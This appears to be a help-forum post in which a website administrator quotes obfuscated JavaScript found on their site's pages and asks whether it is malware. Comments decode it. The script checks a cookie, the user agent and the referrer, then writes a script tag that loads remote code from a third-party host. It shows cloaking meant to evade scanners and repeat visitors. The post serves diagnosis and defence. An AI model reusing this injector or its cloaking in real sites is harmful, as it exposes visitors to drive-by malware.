Hello,
I am the site administrator/content manager for http://socialism.com
We have previously received warnings from Bing that our website contained malicious JavaScript and references to malware networks, but since I was unable to find these specific instances, I assumed Bing was being overly cautious. Furthermore, Google has never given us such warnings:
http://www.google.com/safebrowsing/diagnostic?site=socialism.com
I have run our site through Sucuri SiteCheck, Wepawet, Zulu Risk Scanner, and VirusTotal. All but one say our site is clean or benign; Wepawet reports that our website may be suspicious but cannot point to anything in particular.
http://zulu.zscaler.com/submission/show/9c333b21a4f3b6a9531753d912caefb8-1417810824
Today, however, one of our users received this message while trying to access our site:
http://i.imgur.com/LivZV6F.jpg
Is this a false positive?
Many (all?) of the pages on our site do contain a block of obfuscated JavaScript that I have been unable to identify.
// Obfuscated string table used by everything below. Each entry is an ordinary
// ASCII string written as \x hex escapes; decoded, the entries are (index: value):
//   0 "getTime"    1 "setTime"    2 "; expires="  3 "toGMTString"
//   4 ""           5 "cookie"     6 "="           7 "; path=/"
//   8 ";"          9 "split"     10 "length"     11 "substring"
//  12 "charAt"    13 " "         14 "indexOf"    15 "random"
//  16 "floor"     17 "adf_prods" 18 "e"          19 "<"
//  20 "org"       21 "js"        22 "t"          23 "Data"
//  24 "cd"        25 "n"         26 "src"        27 ">"
//  28 "rt"        29 "http"      30 "ip"         31 "adv"
//  32 "scr"       33 "ia"        34 "med"        35 "match"
//  36 "userAgent" 37 "referrer"  38 '="'         39 "://"
//  40 "."         41 "/get"      42 "?"          43 '"'
//  44 "/"         45 "write"     46 "linked"
// Entries used as obj[_0x45af[i]] are property/method names (obj["cookie"] is
// obj.cookie); the short fragments (18-34, 38-44) are concatenated later into a
// <script> tag. The hex encoding hides these names from a plain text search.
var _0x45af = ["\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65",
"\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67",
"", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x20\x70\x61\x74\x68\x3D\x2F", "\x3B",
"\x73\x70\x6C\x69\x74", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67",
"\x63\x68\x61\x72\x41\x74", "\x20", "\x69\x6E\x64\x65\x78\x4F\x66",
"\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x61\x64\x66\x5F\x70\x72\x6F\x64\x73",
"\x65", "\x3C", "\x6F\x72\x67", "\x6A\x73", "\x74", "\x44\x61\x74\x61", "\x63\x64", "\x6E",
"\x73\x72\x63", "\x3E", "\x72\x74", "\x68\x74\x74\x70", "\x69\x70", "\x61\x64\x76",
"\x73\x63\x72", "\x69\x61", "\x6D\x65\x64", "\x6D\x61\x74\x63\x68",
"\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x3D\x22",
"\x3A\x2F\x2F", "\x2E", "\x2F\x67\x65\x74", "\x3F", "\x22", "\x2F", "\x77\x72\x69\x74\x65",
"\x6C\x69\x6E\x6B\x65\x64"];
function crCx(_0x9b9cx2, _0x9b9cx3, _0x9b9cx4){
// Cookie setter, written here with the string-table lookups decoded.
// Writes "<name>=<value>[; expires=<GMT date>]; path=/" to document.cookie.
//   _0x9b9cx2: cookie name
//   _0x9b9cx3: cookie value
//   _0x9b9cx4: lifetime in days; falsy means no expires attribute (session cookie)
var expiresAttr = "";
if (_0x9b9cx4) {
var expiry = new Date();
expiry.setTime(expiry.getTime() + _0x9b9cx4 * 24 * 60 * 60 * 1000);
expiresAttr = "; expires=" + expiry.toGMTString();
}
document.cookie = _0x9b9cx2 + "=" + _0x9b9cx3 + expiresAttr + "; path=/";
}
;
function rdCx(_0x9b9cx2){
// Cookie reader, written here with the string-table lookups decoded.
// Scans document.cookie for an entry starting with "<name>=" and returns the
// remainder of that entry; returns null when no such cookie exists.
//   _0x9b9cx2: cookie name to look up
var prefix = _0x9b9cx2 + "=";
var entries = document.cookie.split(";");
for (var idx = 0; idx < entries.length; idx++) {
var entry = entries[idx];
// drop the leading spaces that follow each ";" separator
while (entry.charAt(0) === " ") {
entry = entry.substring(1, entry.length);
}
if (entry.indexOf(prefix) === 0) {
return entry.substring(prefix.length, entry.length);
}
}
return null;
}
;
// Random integer 0..9999; appended as a query string to the injected URL below,
// which defeats caching so the remote script is re-fetched each time.
var rdscx = Math[_0x45af[16]](Math[_0x45af[15]]() * 10000);
// Value of the "adf_prods" cookie (null when the visitor has not been marked yet).
var crUnqz = rdCx(_0x45af[17]);
// Fragments of the injected tag, assigned to throwaway names so no meaningful
// word appears in the source. Decoded: vbzl "e", vbza "<", vbzv "org", vbzn "js",
// vbzf "t", vbzb "Data", vbzh "cd", vbzj "n", vbzg "src", vbzq ">", vbzz "rt",
// vbzm "http", vbzd "ip", vbzk "adv", vbzs "scr", vbzc "ia", vbzx "med".
var vbzl = _0x45af[18];
var vbza = _0x45af[19];
var vbzv = _0x45af[20];
var vbzn = _0x45af[21];
var vbzf = _0x45af[22];
var vbzb = _0x45af[23];
var vbzh = _0x45af[24];
var vbzj = _0x45af[25];
var vbzg = _0x45af[26];
var vbzq = _0x45af[27];
var vbzz = _0x45af[28];
var vbzm = _0x45af[29];
var vbzd = _0x45af[30];
var vbzk = _0x45af[31];
var vbzs = _0x45af[32];
var vbzc = _0x45af[33];
var vbzx = _0x45af[34];
// Gate 1: only act when the "adf_prods" cookie is absent. Line 90 below sets it
// for 3 days, so each browser sees the injection at most once every 3 days.
// NOTE(review): this is a plausible reason repeat visits and some scanners see a
// clean page — they are checked after the cookie exists, or from a client that
// fails gate 2.
if (crUnqz == null){
// Gate 2: navigator.userAgent must match MSIE, Trident (IE 11) or Firefox.
if ((navigator[_0x45af[36]][_0x45af[35]](/MSIE/i) || navigator[_0x45af[36]][_0x45af[35]](
/Trident/i) || navigator[_0x45af[36]][_0x45af[35]](/Firefox/i))){
// Gate 3: apparently meant to exclude Linux/Apple/Chrome clients and crawlers,
// but every term is negated and joined with ||, so the condition is true unless
// the user agent matches ALL eight patterns at once — in practice always true.
if ((!navigator[_0x45af[36]][_0x45af[35]](/Linux/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Apple/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Chrome/i) ||! navigator[_0x45af[
36]][_0x45af[35]](/Crawler/i) ||! navigator[_0x45af[36]][_0x45af[35]](/bot/i) ||!
navigator[_0x45af[36]][_0x45af[35]](/Google/i) ||! navigator[_0x45af[36]][_0x45af[35]](
/Yahoo/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Python/i))){
// Gate 4: same construction on document.referrer with /cache/ and /inurl/
// (search-engine cache / dork URLs); again only false if BOTH match, so
// effectively always true.
if ((!document[_0x45af[37]][_0x45af[35]](/cache/i) ||! document[_0x45af[37]][_0x45af[
35]](/inurl/i))){
// Payload: document.write() of a third-party script tag. Decoding the string
// table and the vbz* fragments, the text written is exactly
//   <script src="http://cdn.advertmedia.org/getData.js?<rdscx>"></script>
// so whatever that host serves runs with full access to the page. This is a
// remote-script loader, not a user-agent check; the UA matching only decides
// which visitors receive it.
document[_0x45af[45]](_0x45af[4] + vbza + _0x45af[4] + vbzs + _0x45af[4] + vbzd +
_0x45af[4] + vbzf + _0x45af[13] + vbzg + _0x45af[38] + vbzm + _0x45af[39] + vbzh +
_0x45af[4] + vbzj + _0x45af[40] + vbzk + _0x45af[4] + vbzl + _0x45af[4] + vbzz +
_0x45af[4] + vbzx + _0x45af[4] + vbzc + _0x45af[40] + vbzv + _0x45af[41] + vbzb +
_0x45af[40] + vbzn + _0x45af[42] + rdscx + _0x45af[43] + vbzq + _0x45af[4] + vbza +
_0x45af[44] + vbzs + _0x45af[4] + vbzd + _0x45af[4] + vbzf + _0x45af[4] + vbzq +
_0x45af[4]);
// Mark the browser: sets adf_prods=linked with path=/ for 3 days (see gate 1).
crCx(_0x45af[17], _0x45af[46], 3)
}
}
}
}
;
Is this code causing a drive-by download or Trojan infection? Or is it just a script that checks the user agent?
I should add that I have only been working here for about a month, and I don't know as much as I should about what was on the site before I took over from my predecessor.